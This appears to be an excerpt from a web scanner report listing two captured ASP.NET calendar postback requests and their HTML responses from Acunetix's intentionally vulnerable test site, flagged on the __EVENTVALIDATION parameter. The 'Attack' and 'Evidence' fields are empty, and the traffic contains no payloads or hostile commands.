Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8432&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBACEPnA9sIZGRkwPvqejtYHIKmFuRGrIgKdbveueA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKIjLH9AwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBa8Bz3WDGnjh%2BOmeBNaiOsIYLhnm
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:03 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBACEPnA9sIZGRkwPvqejtYHIKmFuRGrIgKdbveueA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKIjLH9AwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBa8Bz3WDGnjh+OmeBNaiOsIYLhnm" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:White" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8402&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAo0pU7NoIZGRkTeqE0lLMibSaom2kQjdpIsvA1VQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKile%2BKCgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX7dAWKmAhcYw1wo76usdta8qYGDQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:33 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAo0pU7NoIZGRkTeqE0lLMibSaom2kQjdpIsvA1VQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKile+KCgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX7dAWKmAhcYw1wo76usdta8qYGDQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:White" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
